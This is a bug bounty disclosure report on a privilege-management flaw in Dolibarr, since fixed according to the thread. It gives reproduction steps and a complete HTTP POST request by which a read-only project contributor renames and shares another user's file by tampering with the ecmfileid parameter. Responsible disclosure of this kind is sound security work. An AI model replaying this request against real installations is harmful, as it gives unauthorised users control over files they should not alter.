Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on

May 19th 2021


💥 BUG

unprivileged user can edit/share linked file of a project .

💥 VIDEO

https://drive.google.com/file/d/1YaiG0vjFTuqZRck7dMLqkhT7HSZqaEdu/view?usp=sharing

💥 STEP TO REPRODUCE

1. From admin account add user B as normal user .
now give user B bellow permission for project module.
---->Read projects and tasks (shared project and projects I'm contact for). Can also enter time consumed, for me or my hierarchy, on assigned tasks (Timesheet)
2. Now from admin account goto https://localhost/dolibarr/htdocs/projet/index.php?mainmenu=project&leftmenu= and create a project.
now add user B to this project a contributor .
Also upload a file there .

3. Finally goto user B account and visit above project .Here user B cant edit above uploaded document .


Now user B sent bellow request in burpsuite to edit/share the document .

POST /dolibarr/htdocs/projet/document.php?&id=1&file=PJ2105-0001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 275
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/projet/document.php?action=editfile&urlfile=PJ2105-0001%2FPJ2105-0001-simple.html.noexe&id=1&file=PJ2105-0001&page_y=504
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$eIz0ktTX4BELW6Fo.nN3NeeCTrlUUouAR.pwUqzkRAdBKaN.u3DVy&action=renamefile&id=1&modulepart=project&section_dir=PJ2105-0001%2F&renamefilefrom=PJ2105-0001-simple.html.noexe&renamefileto=PJ2105-0001-sssimplse.html.noexe&shareenabled=on&ecmfileid=22&renamefilesave=Save

here in this postdata you change ecmfileid parameter value to your file id

💥 Impact

privilege escalation bug

Laurent
6 months ago

Maintainer


Some fixes were done on issues related to similar troubles. I am not sure this is fixed. Will need to recheck once v14 has been released or on develop branch after the 22th of may 2021.

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on ad2e56 a month ago
Laurent Destailleur has been awarded the fix bounty